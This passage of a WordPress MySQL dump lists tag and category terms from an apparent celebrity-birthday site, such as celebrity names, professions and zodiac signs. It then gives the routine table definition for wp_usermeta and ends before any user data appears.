Kravitz','lenny-kravitz',0),(229,'best male rock vocal performance Grammy','best-male-rock-vocal-performance-grammy',0),(230,'Morgan Freeman','morgan-freeman',0),(231,'Best Actor','best-actor',0),(232,'Morgan Freeman profession','morgan-freeman-profession',0),(233,'famous militars','famous-militars',0),(234,'million dollar baby','million-dollar-baby',0),(235,'Robert Euglund','robert-euglund',0),(236,'films directed by Robert Euglund','films-directed-by-robert-euglund',0),(237,'freddy kreuger','freddy-kreuger',0),(238,'ferddy kreuger actor','ferddy-kreuger-actor',0),(239,'Robert Englund','robert-englund',0),(240,'Zachary Quinto','zachary-quinto',0),(241,'gay celebrities','gay-celebrities',0),(242,'Jonathan Groff','jonathan-groff',0),(243,'Touched by an Angel cast','touched-by-an-angel-cast',0),(244,'Star trek','star-trek',0),(245,'Laurence Tureaud','laurence-tureaud',0),(246,'The A-Team','the-a-team',0),(247,'Jim Nabors Television man','jim-nabors-television-man',0),(249,'Anderson Hays Cooper','anderson-hays-cooper',0),(250,'famous journalist','famous-journalist',0),(251,'Myanmar','myanmar',0),(252,'National Educational Film Festival winners','national-educational-film-festival-winners',0),(253,'National Educational Film Festival','national-educational-film-festival',0),(254,'Angelina Jolie Voight','angelina-jolie-voight',0),(255,'Angelina Jolie','angelina-jolie',0),(256,'famous actress','famous-actress',0),(257,'sexiest actress','sexiest-actress',0),(258,'UN Refugee Agency','un-refugee-agency',0),(259,'Golden Globe Award winners','golden-globe-award-winners',0),(260,'Golden Globe Award','golden-globe-award',0),(261,'Angelina Jolie\'s ex\'s','angelina-jolies-exs',0),(262,'Sabrina Ann Lynn Carpenter','sabrina-ann-lynn-carpenter',0),(263,'Sabrina Carpenter','sabrina-carpenter',0),(264,'Jessica Wedge','jessica-wedge',0),(265,'disney celebrities','disney-celebrities',0),(266,'radio disney','radio-disney',0),(268,'Tony Hawk','tony-hawk',0),(269,'most famous skateboarder','most-famous-skateboarder',0),(270,'Dogtown skateboards','dogtown-skateboards',0),(271,'skateboarding contests','skateboarding-contests',0),(272,'Birdhouse Projects','birdhouse-projects',0),(273,'Tony Hawk Foundation','tony-hawk-foundation',0),(274,'Robert Pattinson','robert-pattinson',0),(275,'Twilight','twilight',0),(276,'Twilight stars','twilight-stars',0),(277,'Water for Elephants cast','water-for-elephants-cast',0),(278,'sexiest movie actor','sexiest-movie-actor',0),(279,'international medical corps','international-medical-corps',0),(280,'films directed by Robert Englund','films-directed-by-robert-englund',0),(281,'Famous tv actress','famous-tv-actress',0),(282,'baywatch celebrities','baywatch-celebrities',0),(283,'activist actress','activist-actress',0),(284,'american actress','american-actress',0),(285,'redhead celebrities','redhead-celebrities',0),(286,'disney star','disney-star',0),(287,'Mean girls celebrities','mean-girls-celebrities',0),(288,'disney star with criminal record','disney-star-with-criminal-record',0),(289,'mission imposible cast','mission-imposible-cast',0),(290,'hot movie actor','hot-movie-actor',0),(291,'Katie Holmes\' ex','katie-holmes-ex',0),(292,'New York rapper','new-york-rapper',0),(293,'rap grammy award','rap-grammy-award',0),(294,'music artist with criminal reccord','music-artist-with-criminal-reccord',0),(296,'British musician','british-musician',0),(297,'Most famous drummer','most-famous-drummer',0),(298,'Liverpool celebrity','liverpool-celebrity',0),(299,'country music artist','country-music-artist',0),(300,'Arkansas musician','arkansas-musician',0),(301,'Toby Keith last album','toby-keith-last-album',0),(302,'Forrest Gump leading actor','forrest-gump-leading-actor',0),(303,'famous movie actor','famous-movie-actor',0),(304,'Toy Story voices','toy-story-voices',0),(305,'California State University celebrities','california-state-university-celebrities',0),(306,'Colombian celebrities','colombian-celebrities',0),(307,'foregin celebrities','foregin-celebrities',0),(308,'hot amercian actress','hot-amercian-actress',0),(309,'ABC network stars','abc-network-stars',0),(310,'latin american celebrity','latin-american-celebrity',0),(312,'italian important people','italian-important-people',0),(313,'foreign designer','foreign-designer',0),(314,'Armani fashion designs','armani-fashion-designs',0),(315,'international clothing line','international-clothing-line',0),(316,'high grossing television shows','high-grossing-television-shows',0),(317,'celebrities from pennsylvania','celebrities-from-pennsylvania',0),(318,'Charlie cast','charlie-cast',0),(319,'Lost cast','lost-cast',0),(320,'celebrities in politics','celebrities-in-politics',0),(321,'California governor','california-governor',0),(322,'foreign celebrity','foreign-celebrity',0),(323,'most famous action film star','most-famous-action-film-star',0),(324,'famous bodybuilder','famous-bodybuilder',0),(326,'foreign musician','foreign-musician',0),(327,'mexican musician','mexican-musician',0),(328,'famous guitarist','famous-guitarist',0),(329,'latin infused jazz music','latin-infused-jazz-music',0),(330,'latin infused rock music','latin-infused-rock-music',0),(331,'Harry Potter cast','harry-potter-cast',0),(332,'richest actor','richest-actor',0),(333,'british actor','british-actor',0),(334,'foreign movie actor','foreign-movie-actor',0),(335,'famous actor and musician','famous-actor-and-musician',0),(336,'maryland celebrity','maryland-celebrity',0),(337,'baywatch star','baywatch-star',0),(338,'celebrities in dancing with the stars','celebrities-in-dancing-with-the-stars',0),(339,'famous american wrestler','famous-american-wrestler',0),(340,'Ohio celebrities','ohio-celebrities',0),(341,'smack down stars','smack-down-stars',0),(342,'Bloodsport cast','bloodsport-cast',0),(343,'american actors winner at Cannes film festival','american-actors-winner-at-cannes-film-festival',0),(344,'80\'s famous actor','80s-famous-actor',0),(345,'important people from film industry','important-people-from-film-industry',0),(346,'singer and actress celebrity','singer-and-actress-celebrity',0),(347,'Anaconda cast','anaconda-cast',0),(348,'latin culture artist','latin-culture-artist',0),(349,'star borned in Bronx','star-borned-in-bronx',0),(351,'argentinian basketbal player','argentinian-basketbal-player',0),(352,'famous latin american in US','famous-latin-american-in-us',0),(353,'NBA player','nba-player',0),(354,'Chicago Bulls','chicago-bulls',0),(355,'professional basketball player','professional-basketball-player',0),(357,'party hoster at Bloomington National Guard','party-hoster-at-bloomington-national-guard',0),(358,'american entrepeneur','american-entrepeneur',0),(359,'AudioNet creator','audionet-creator',0),(360,'Dallas Mavericks basketball team','dallas-mavericks-basketball-team',0),(361,'important businessman','important-businessman',0),(362,'kansas celebrity','kansas-celebrity',0),(363,'National Network to End Domestic Violence','national-network-to-end-domestic-violence',0),(364,'Best Female Vocalist','best-female-vocalist',0),(365,'most famous comedian','most-famous-comedian',0),(366,'bicentennial man cast','bicentennial-man-cast',0),(367,'best comedy movies','best-comedy-movies',0),(368,'young famous female singer','young-famous-female-singer',0),(369,'Justin Beiber girlfriend','justin-beiber-girlfriend',0),(370,'celebreity supporting UNICEF','celebreity-supporting-unicef',0),(371,'Saturday Night Live comedian','saturday-night-live-comedian',0),(372,'USC Trojan football fan','usc-trojan-football-fan',0),(373,'movie comedian','movie-comedian',0),(374,'Pamela Anderson','pamela-anderson',0),(375,'Spurs','spurs',0),(376,'Arnold Schwarzenegger','arnold-schwarzenegger',0),(377,'Terminator','terminator',0),(378,'Footer','footer',0),(380,'Barack Obama','barack-obama',0),(381,'Important politician','important-politician',0),(382,'US president','us-president',0),(383,'Female star','female-star',0),(384,'Blonde celebrity','blonde-celebrity',0),(385,'Television celebrity','television-celebrity',0),(386,'Model','model',0),(389,'American model','american-model',0),(390,'Model/Actress','modelactress',0),(391,'Blonde model','blonde-model',0),(392,'Cosplay','cosplay',0),(393,'Youtuber','youtuber',0),(394,'Anime','anime',0),(395,'Charlize Theron','charlize-theron',0),(396,'Sean Penn','sean-penn',0),(397,'actor','actor',0),(398,'movies','movies',0),(399,'Antonio Banderas','antonio-banderas',0),(400,'Alyson Stoner','alyson-stoner',0),(401,'actrees','actrees',0),(402,'movie star','movie-star',0),(403,'Cara Delevingne','cara-delevingne',0),(405,'Alfred Hitchcock','alfred-hitchcock',0),(406,'movie director','movie-director',0),(407,'writer','writer',0),(408,'Mila Kunis','mila-kunis',0),(409,'Kung Fu Panda','kung-fu-panda',0),(410,'Jack Black','jack-black',0),(411,'comedian movies','comedian-movies',0),(412,'comedian actor','comedian-actor',0),(413,'actress','actress',0),(414,'movie actress','movie-actress',0),(415,'identity thief','identity-thief',0),(416,'comedy series','comedy-series',0),(417,'Melissa McCarthy','melissa-mccarthy',0),(418,'Edward Norton','edward-norton',0),(419,'film producer','film-producer',0),(420,'Academy Awards','academy-awards',0),(421,'Gerald McRaney','gerald-mcraney',0),(422,'Actors','actors',0),(423,'Amy Adams','amy-adams',0),(424,'Hayden Panettiere','hayden-panettiere',0),(425,'Tv Actress','tv-actress',0),(426,'Rupert Grint','rupert-grint',0),(427,'Harry Potter','harry-potter',0),(428,'Tim Burton','tim-burton',0),(429,'Aaron Paul','aaron-paul',0),(430,'TV Shows','tv-shows',0),(432,'singer','singer',0),(433,'Debbie Gibson','debbie-gibson',0),(434,'Tim Hardaway','tim-hardaway',0),(435,'September','september',0),(436,'first','first',0),(437,'basketball','basketball',0),(438,'NBA','nba',0),(439,'Golden State Warriors','golden-state-warriors',0),(440,'Keanu Reeves','keanu-reeves',0),(441,'second','second',0),(442,'Matrix','matrix',0),(443,'Hollywood','hollywood',0),(444,'Charlie Sheen','charlie-sheen',0),(445,'third','third',0),(446,'Two and A Half Men','two-and-a-half-men',0),(447,'TV','tv',0),(448,'Beyonce Knowles','beyonce-knowles',0),(449,'Beyonce','beyonce',0),(450,'Pop','pop',0),(451,'Music','music',0),(452,'Destiny\'s Child','destinys-child',0),(453,'Michael Emerson','michael-emerson',0),(454,'Person of Interest','person-of-interest',0),(455,'Lost','lost',0),(456,'fourth','fourth',0),(457,'Emmy Award','emmy-award',0),(458,'Pop Singer','pop-singer',0),(459,'Pink','pink',0),(460,'Birthday','birthday',0),(461,'Wiki','wiki',0),(462,'Adam Sandler','adam-sandler',0),(463,'Comedy','comedy',0),(464,'Ryan Phillippe','ryan-phillippe',0),(465,'BirthdayPedia','birthdaypedia',0),(466,'Birth','birth',0),(467,'Ludacris','ludacris',0),(468,'Rap','rap',0),(469,'Amy Winehouse','amy-winehouse',0),(470,'Soul','soul',0),(471,'Tommy Lee Jones','tommy-lee-jones',0),(472,'Mark Anthony','mark-anthony',0),(473,'The Sopranos','the-sopranos',0),(474,'TV Show Host','tv-show-host',0),(475,'Important People','important-people',0),(477,'Opera Singer','opera-singer',0),(478,'Opera','opera',0),(479,'Classical Songs','classical-songs',0),(480,'Andrea Bocelli','andrea-bocelli',0),(481,'Skylar Astin','skylar-astin',0),(482,'Brodway','brodway',0),(483,'Kevin Sorbo','kevin-sorbo',0),(484,'Will Smith','will-smith',0),(485,'Hilary Duff','hilary-duff',0),(486,'Kevin Durant','kevin-durant',0),(487,'Hilary Duff; Movie Actress','hilary-duff-movie-actress',0),(488,'Marion Cotillard','marion-cotillard',0),(489,'Mahatma Ghandi','mahatma-ghandi',0),(490,'Non-Violence','non-violence',0),(491,'Ghandi','ghandi',0),(492,'India','india',0),(493,'Gwen Stefani','gwen-stefani',0),(494,'songwriter','songwriter',0),(495,'American singer','american-singer',0),(496,'Russell Simmons','russell-simmons',0),(497,'Hip Hop','hip-hop',0),(498,'NoDoubt','nodoubt',0),(499,'Bernie Mac','bernie-mac',0),(500,'Carole Lombard','carole-lombard',0),(501,'Clark Gable','clark-gable',0),(502,'Russell Simmons birthday','russell-simmons-birthday',0),(503,'when was Russell Simmons born','when-was-russell-simmons-born',0),(504,'celebs born in october','celebs-born-in-october',0),(505,'libra celebrities','libra-celebrities',0),(506,'celebrities born in october','celebrities-born-in-october',0),(507,'Russell Simmons age','russell-simmons-age',0),(508,'Russell Simmons facts','russell-simmons-facts',0),(509,'celebrities born october 4','celebrities-born-october-4',0),(510,'Bernie Mac comedian','bernie-mac-comedian',0),(511,'bernie mac birthday','bernie-mac-birthday',0),(512,'bernie mac death','bernie-mac-death',0),(513,'october celebrities','october-celebrities',0),(514,'celebrities born on october 5','celebrities-born-on-october-5',0),(515,'bernie mac dead','bernie-mac-dead',0),(516,'bernie mac die','bernie-mac-die',0),(517,'Actors','actors',0),(518,'TV Actors','tv-actors',0),(519,'Movie Actors','movie-actors',0),(520,'Historic Figures','historic-figures',0),(521,'Actresses','actresses',0),(522,'TV Actresses','tv-actresses',0),(523,'Movie Actresses','movie-actresses',0),(524,'Musicians','musicians',0),(525,'Drummers','drummers',0),(526,'Guitarist','guitarist',0),(527,'Bassists','bassists',0),(528,'Rappers','rappers',0),(529,'Singers','singers',0),(530,'Composers','composers',0),(531,'Athletes','athletes',0),(532,'Football','football',0),(533,'Soccer','soccer',0),(534,'Baseball','baseball',0),(535,'Hockey','hockey',0),(536,'Basketball','basketball',0),(537,'Wrestling','wrestling',0),(538,'Boxing','boxing',0),(539,'Golf','golf',0),(540,'Gymnastics','gymnastics',0),(541,'Tennis','tennis',0),(542,'Models','models',0),(543,'Astrological Signs','astrological-signs',0),(544,'Entertainers','entertainers',0),(545,'Comedians','comedians',0),(546,'TV Hosts','tv-hosts',0),(547,'Sports Announcers','sports-announcers',0),(548,'Dancers','dancers',0),(549,'Aquarius','aquarius',0),(550,'Pisces','pisces',0),(551,'Aries','aries',0),(552,'Taurus','taurus',0),(553,'Gemini','gemini',0),(554,'Cancer','cancer',0),(555,'Leo','leo',0),(556,'Virgo','virgo',0),(557,'Libra','libra',0),(558,'Scorpio','scorpio',0),(559,'Sagittarius','sagittarius',0),(560,'Capricorn','capricorn',0),(561,'Month','month',0),(562,'January','january',0),(563,'February','february',0),(564,'March','march',0),(565,'April','april',0),(566,'May','may',0),(567,'June','june',0),(568,'July','july',0),(569,'August','august',0),(570,'September','september',0),(571,'October','october',0),(572,'November','november',0),(573,'December','december',0),(574,'Pop','pop-singers',0),(575,'Country','country-singers',0),(576,'Classical','classical-singers',0),(577,'Blues','blues',0),(578,'Rock','rock',0),(579,'R&B/Soul','rbsoul',0),(580,'Indie','indie',0),(581,'Carole Lombard actress','carole-lombard-actress',0),(582,'Carole Lombard death','carole-lombard-death',0),(583,'Carole Lombard birthday','carole-lombard-birthday',0),(584,'when was Carole Lombard','when-was-carole-lombard',0),(585,'Carole Lombard crash','carole-lombard-crash',0),(586,'Carole Lombard photos','carole-lombard-photos',0),(587,'Carole Lombard biography','carole-lombard-biography',0),(588,'Vladmir Putin','vladmir-putin',0),(589,'Russia','russia',0),(590,'Matt Damon','matt-damon',0),(591,'Jhon Lennon','jhon-lennon',0),(592,'Liverpool','liverpool',0),(593,'Mario Lopez','mario-lopez',0),(594,'gwen stefani birthday','gwen-stefani-birthday',0),(595,'Gwen Stefani facts','gwen-stefani-facts',0),(596,'Gwen Stefani bio','gwen-stefani-bio',0),(597,'Gwen Stefani age','gwen-stefani-age',0),(598,'Gwen Stefani kids','gwen-stefani-kids',0),(599,'Gwen Stefani husband','gwen-stefani-husband',0),(600,'when is gwen stefanis birthday','when-is-gwen-stefanis-birthday',0),(601,'Eleanor Roosevelt','eleanor-roosevelt',0),(602,'first lady','first-lady',0),(603,'Franklin D. Roosevelt','franklin-d-roosevelt',0),(604,'civil rights activist','civil-rights-activist',0),(605,'Politicians','politicians',0),(606,'russias president','russias-president',0),(607,'politicians born in october','politicians-born-in-october',0),(608,'Vladimir Putin','vladimir-putin',0),(609,'Vladimir Putin birthday','vladimir-putin-birthday',0),(610,'Vladimir Putin age','vladimir-putin-age',0),(611,'Vladimir Putin facts','vladimir-putin-facts',0),(612,'Vladimir Putin biography','vladimir-putin-biography',0),(613,'Vladimir Putin bio','vladimir-putin-bio',0),(614,'libra celebs','libra-celebs',0),(615,'Vladimir Putin russia','vladimir-putin-russia',0),(616,'Matt Damon bio','matt-damon-bio',0),(617,'Matt Damon facts','matt-damon-facts',0),(618,'Matt Damon birthday','matt-damon-birthday',0),(619,'Matt Damon age','matt-damon-age',0),(620,'Matt Damon wife','matt-damon-wife',0),(621,'Matt Damon kids','matt-damon-kids',0),(622,'Matt Damon movies','matt-damon-movies',0),(623,'Hugh Jackman','hugh-jackman',0),(624,'X-Men','x-men',0),(625,'Wolverine','wolverine',0),(626,'Paul SImon','paul-simon',0),(627,'composer','composer',0),(628,'musicians','musicians',0),(629,'American rock music','american-rock-music',0),(630,'NATO','nato',0),(631,'Dwight Eisenhower','dwight-eisenhower',0),(632,'President of United States','president-of-united-states',0),(633,'Cold War','cold-war',0),(634,'Normandy invasion','normandy-invasion',0),(635,'World War II','world-war-ii',0),(636,'Sarah Ferguson','sarah-ferguson',0),(637,'Duchess of York','duchess-of-york',0),(638,'Prince Andrew','prince-andrew',0),(639,'Eminem','eminem',0),(640,'rap singer','rap-singer',0),(641,'American rapper','american-rapper',0),(642,'drugs','drugs',0),(643,'Directors','directors',0),(644,'Writers','writers',0),(645,'Reality Stars','reality-stars',0),(646,'Journalists','journalists',0),(647,'Mumbai','mumbai',0),(648,'Slumdog Millionaire','slumdog-millionaire',0),(649,'Evander Holyfield','evander-holyfield',0),(650,'Box','box',0),(651,'Sport','sport',0),(652,'WBA championship','wba-championship',0),(653,'WBA','wba',0),(654,'Designers','designers',0),(655,'Artists','artists',0),(656,'John Lennon','john-lennon',0),(657,'John Lennon birthday','john-lennon-birthday',0),(658,'John Lennon death','john-lennon-death',0),(659,'John Lennon life','john-lennon-life',0),(660,'John Lennon the beatles','john-lennon-the-beatles',0),(661,'who shot John Lennon','who-shot-john-lennon',0),(662,'when was John Lennon born','when-was-john-lennon-born',0),(663,'John Lennon facts','john-lennon-facts',0),(664,'Mario Lopez birthday','mario-lopez-birthday',0),(665,'Mario Lopez age','mario-lopez-age',0),(666,'Mario Lopez wife','mario-lopez-wife',0),(667,'Mario Lopez daughter','mario-lopez-daughter',0),(668,'Mario Lopez dancing with the stars','mario-lopez-dancing-with-the-stars',0),(669,'Mario Lopez saved by the bell','mario-lopez-saved-by-the-bell',0),(670,'Eleanor Roosevelt age','eleanor-roosevelt-age',0),(671,'Eleanor Roosevelt bio','eleanor-roosevelt-bio',0),(672,'Eleanor Roosevelt facts','eleanor-roosevelt-facts',0),(673,'Eleanor Roosevelt children','eleanor-roosevelt-children',0),(674,'Eleanor Roosevelt death','eleanor-roosevelt-death',0),(675,'Eleanor Roosevelt birthday','eleanor-roosevelt-birthday',0),(676,'when was Eleanor Roosevelt born','when-was-eleanor-roosevelt-born',0),(677,'Eleanor Roosevelt real name','eleanor-roosevelt-real-name',0),(678,'famous people born in october','famous-people-born-in-october',0),(679,'Hugh Jackman birthday','hugh-jackman-birthday',0),(680,'Hugh Jackman age','hugh-jackman-age',0),(681,'Hugh Jackman wife','hugh-jackman-wife',0),(682,'Hugh Jackman bio','hugh-jackman-bio',0),(683,'when was Hugh Jackman born','when-was-hugh-jackman-born',0),(684,'Hugh Jackman wolverine','hugh-jackman-wolverine',0),(685,'Hugh Jackman movies','hugh-jackman-movies',0),(686,'Jeff Goldblum','jeff-goldblum',0),(687,'The fly','the-fly',0),(688,'Jurassic Park','jurassic-park',0),(689,'The Tonight Show','the-tonight-show',0),(690,'Johnny Carson','johnny-carson',0),(691,'television legacy','television-legacy',0),(692,'Drake','drake',0),(693,'Hip Hop Music','hip-hop-music',0),(694,'Degrassi: The Next Generation','degrassi-the-next-generation',0),(695,'Pablo Picasso','pablo-picasso',0),(696,'artist','artist',0),(697,'Painter','painter',0),(698,'20th century','20th-century',0),(699,'Picasso','picasso',0),(700,'Hillary Clinton','hillary-clinton',0),(701,'politics','politics',0),(702,'US Presidency','us-presidency',0),(703,'Teddy Roosevelt','teddy-roosevelt',0),(704,'Caitlyn Jenner','caitlyn-jenner',0),(705,'Kardashians','kardashians',0),(706,'transgender','transgender',0),(707,'sexual orientation','sexual-orientation',0),(708,'Gabrielle Union','gabrielle-union',0),(709,'activist','activist',0),(710,'Dwyane Wade','dwyane-wade',0),(711,'Henry Winkler','henry-winkler',0),(712,'producer','producer',0),(713,'Discovering of Americas','discovering-of-americas',0),(714,'Christopher Columbus','christopher-columbus',0),(715,'New World','new-world',0),(716,'Trips','trips',0),(717,'Snoop Dogg','snoop-dogg',0),(718,'Snoop Lion','snoop-lion',0),(719,'Rap Music','rap-music',0),(720,'Kim Kardashian','kim-kardashian',0),(721,'Paul Simon birthday','paul-simon-birthday',0),(722,'Paul Simon age','paul-simon-age',0),(723,'Paul Simon and art garfunkel','paul-simon-and-art-garfunkel',0),(724,'simon and garfunkel','simon-and-garfunkel',0),(725,'Paul Simon facts','paul-simon-facts',0),(726,'Paul Simon bio','paul-simon-bio',0),(727,'Paul Simon wife','paul-simon-wife',0),(728,'Paul Simon songs','paul-simon-songs',0),(729,'Dwight Eisenhower birthday','dwight-eisenhower-birthday',0),(730,'Dwight Eisenhower facts','dwight-eisenhower-facts',0),(731,'Dwight Eisenhower bio','dwight-eisenhower-bio',0),(732,'presidents birthdays','presidents-birthdays',0),(733,'34th president','34th-president',0),(734,'dwight d eisenhower','dwight-d-eisenhower',0),(735,'president dwight eisenhower','president-dwight-eisenhower',0),(736,'general dwight eisenhower','general-dwight-eisenhower',0),(737,'presidents born in october','presidents-born-in-october',0),(738,'libra presidents','libra-presidents',0),(739,'Sarah Ferguson birthday','sarah-ferguson-birthday',0),(740,'Sarah Ferguson facts','sarah-ferguson-facts',0),(741,'Sarah Ferguson age','sarah-ferguson-age',0),(742,'andrew Sarah Ferguson','andrew-sarah-ferguson',0),(743,'princess Sarah Ferguson','princess-sarah-ferguson',0),(744,'duchess Sarah Ferguson','duchess-sarah-ferguson',0),(745,'october 15th','october-15th',0),(746,'Bryce Harper','bryce-harper',0),(747,'Bryce Harper birthday','bryce-harper-birthday',0),(748,'Bryce Harper baseball','bryce-harper-baseball',0),(749,'Bryce Harper stats','bryce-harper-stats',0),(750,'Bryce Harper nationals','bryce-harper-nationals',0),(751,'Bryce Harper facts','bryce-harper-facts',0),(752,'Bryce Harper bio','bryce-harper-bio',0),(753,'baseball birthdays','baseball-birthdays',0),(754,'october 16','october-16',0),(755,'Eminem birthday','eminem-birthday',0),(756,'Eminem bio','eminem-bio',0),(757,'Eminem real name','eminem-real-name',0),(758,'Eminem facts','eminem-facts',0),(759,'rappers born in october','rappers-born-in-october',0),(760,'when is eminems birthday','when-is-eminems-birthday',0),(761,'Freida Pinto','freida-pinto',0),(762,'Freida Pinto age','freida-pinto-age',0),(763,'Freida Pinto birthday','freida-pinto-birthday',0),(764,'Freida Pinto facts','freida-pinto-facts',0),(765,'Freida Pinto model','freida-pinto-model',0),(766,'Freida Pinto actress','freida-pinto-actress',0),(767,'Freida Pinto slumdog millionaire','freida-pinto-slumdog-millionaire',0),(768,'Freida Pinto bio','freida-pinto-bio',0),(769,'october 18','october-18',0),(770,'Aishwarya Rai Bachchan','aishwarya-rai-bachchan',0),(771,'Nelly','nelly',0),(772,'rappers','rappers',0),(773,'Kendall Jenner','kendall-jenner',0),(774,'Reality Shows','reality-shows',0),(775,'Jessa Duggar','jessa-duggar',0),(776,'Tv Show','tv-show',0),(777,'Relationships','relationships',0),(778,'Kris Jenner','kris-jenner',0),(779,'talk show','talk-show',0),(780,'TV talk show','tv-talk-show',0),(781,'Bruce Jenner','bruce-jenner',0),(782,'Lamar Odon','lamar-odon',0),(783,'drug abuse','drug-abuse',0),(784,'Khloé Kardashian','khloe-kardashian',0),(785,'Nevada brothel','nevada-brothel',0),(786,'Gordon Ramsay','gordon-ramsay',0),(787,'Chef','chef',0),(788,'Hell\'s Kitchen','hells-kitchen',0),(789,'Restaurants','restaurants',0),(790,'Carl Sagan','carl-sagan',0),(791,'NASA','nasa',0),(792,'Astronomy','astronomy',0),(793,'Cosmos','cosmos',0),(794,'Tracy Morgan','tracy-morgan',0),(795,'Leo DiCaprio','leo-dicaprio',0),(796,'Actor Movies','actor-movies',0),(797,'Stand-Up','stand-up',0),(798,'Comedian','comedian',0),(799,'Saturday Night Live','saturday-night-live',0),(800,'Evander Holyfield birthday','evander-holyfield-birthday',0),(801,'Evander Holyfield age','evander-holyfield-age',0),(802,'Evander Holyfield facts','evander-holyfield-facts',0),(803,'Evander Holyfield bio','evander-holyfield-bio',0),(804,'Evander Holyfield mike tyson','evander-holyfield-mike-tyson',0),(805,'Evander Holyfield career','evander-holyfield-career',0),(806,'Evander Holyfield boxer','evander-holyfield-boxer',0),(807,'Ryan Gosling','ryan-gosling',0),(808,'Movie Awards','movie-awards',0),(809,'Whoopi Goldberg','whoopi-goldberg',0),(810,'Racism','racism',0),(811,'Snoop Dogg birthday','snoop-dogg-birthday',0),(812,'Snoop Dogg biography','snoop-dogg-biography',0),(813,'Snoop Dogg age','snoop-dogg-age',0),(814,'Snoop Dogg albums','snoop-dogg-albums',0),(815,'Snoop Dogg rapper','snoop-dogg-rapper',0),(816,'snoop dogg songs','snoop-dogg-songs',0),(817,'Kim Kardashian birthday','kim-kardashian-birthday',0),(818,'Kim Kardashian bio','kim-kardashian-bio',0),(819,'Kim Kardashian sex tape','kim-kardashian-sex-tape',0),(820,'when is Kim Kardashians birthday','when-is-kim-kardashians-birthday',0),(821,'Kim Kardashian age','kim-kardashian-age',0),(822,'Kim Kardashian kayne','kim-kardashian-kayne',0),(823,'Kim Kardashian facts','kim-kardashian-facts',0),(824,'Prince Charles','prince-charles',0),(825,'British Personalities','british-personalities',0),(826,'Duke of Cornwall','duke-of-cornwall',0),(827,'British Monarchy','british-monarchy',0),(828,'Victoria\'s Secret Angel','victorias-secret-angel',0),(829,'Modeling','modeling',0),(830,'Fashion','fashion',0),(831,'Fashion Industry','fashion-industry',0),(832,'Television','television',0),(833,'Danny Devito','danny-devito',0),(834,'filmmaker','filmmaker',0),(835,'director','director',0),(836,'Owen Wilson','owen-wilson',0),(837,'comedic films','comedic-films',0),(838,'Calvin Klein','calvin-klein',0),(839,'cosmetics','cosmetics',0),(840,'fragrances','fragrances',0),(841,'men\'s wear','mens-wear',0),(842,'women\'s wear','womens-wear',0),(843,'fashion design','fashion-design',0),(844,'Robert Kennedy','robert-kennedy',0),(845,'Attorney General of the United States','attorney-general-of-the-united-states',0),(846,'law','law',0),(847,'U.S. Senator','u-s-senator',0),(848,'Jeff Goldblum birthday','jeff-goldblum-birthday',0),(849,'Jeff Goldblum wife','jeff-goldblum-wife',0),(850,'Jeff Goldblum bio','jeff-goldblum-bio',0),(851,'wiki jeff goldblum','wiki-jeff-goldblum',0),(852,'actors born in october','actors-born-in-october',0),(853,'Johnny Carson birthday','johnny-carson-birthday',0),(854,'Johnny Carson death','johnny-carson-death',0),(855,'Johnny Carson show','johnny-carson-show',0),(856,'Johnny Carson life','johnny-carson-life',0),(857,'Johnny Carson biography','johnny-carson-biography',0),(858,'Johnny Carson wiki','johnny-carson-wiki',0),(859,'Harold Ramis','harold-ramis',0),(860,'Scarlett Johansen','scarlett-johansen',0),(861,'acting','acting',0),(862,'Miley Cyrus','miley-cyrus',0),(863,'Hannah Montana','hannah-montana',0),(864,'MTV','mtv',0),(865,'scorpio celebs','scorpio-celebs',0),(866,'celebrities born on October 23','celebrities-born-on-october-23',0),(867,'drake birthday','drake-birthday',0),(868,'when is drakes birthdayf','when-is-drakes-birthdayf',0),(869,'drake facts','drake-facts',0),(870,'drakes real name','drakes-real-name',0),(871,'when drake birthday','when-drake-birthday',0),(872,'Sarah Hyland','sarah-hyland',0),(873,'Modern Family TV Show','modern-family-tv-show',0),(874,'Joe DiMaggio','joe-dimaggio',0),(875,'Baseball','baseball',0),(876,'Sport People','sport-people',0),(877,'New York Yankees','new-york-yankees',0),(878,'Baseball World Series','baseball-world-series',0),(879,'Tina Turner','tina-turner',0),(880,'R&R','rr',0),(881,'soul music','soul-music',0),(882,'Jimi Hendrix','jimi-hendrix',0),(883,'guitar leyend','guitar-leyend',0),(884,'experimental music','experimental-music',0),(885,'rock star legend','rock-star-legend',0),(886,'Jon Stewart','jon-stewart',0),(887,'TV Host','tv-host',0),(888,'HBO','hbo',0),(889,'C.S. Lewis','c-s-lewis',0),(890,'Novelist','novelist',0),(891,'JRR Tolkien','jrr-tolkien',0),(892,'Chronicles of Narnia','chronicles-of-narnia',0),(893,'Mark Twain','mark-twain',0),(894,'Tom Sawyer','tom-sawyer',0),(895,'Tom Sawyer and Adventures of Huckleberry Finn','tom-sawyer-and-adventures-of-huckleberry-finn',0),(896,'American literature','american-literature',0),(897,'Pablo Picasso birthday','pablo-picasso-birthday',0),(898,'Pablo Picasso wife','pablo-picasso-wife',0),(899,'Pablo Picasso facts','pablo-picasso-facts',0),(900,'biografia pablo picasso','biografia-pablo-picasso',0),(901,'Pablo Picasso biography','pablo-picasso-biography',0),(902,'Pablo Picasso life','pablo-picasso-life',0),(903,'about Pablo Picasso','about-pablo-picasso',0),(904,'artists born in october','artists-born-in-october',0),(905,'Hillary Clinton 2016','hillary-clinton-2016',0),(906,'Hillary Clinton president','hillary-clinton-president',0),(907,'Hillary Clinton birthday','hillary-clinton-birthday',0),(908,'Hillary Clinton facts','hillary-clinton-facts',0),(909,'Hillary Clinton biography','hillary-clinton-biography',0),(910,'age Hillary Clinton','age-hillary-clinton',0);
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_usermeta`
--
DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_usermeta` (
`umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`umeta_id`),
KEY `user_id` (`user_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=338 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_usermeta`
--
LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
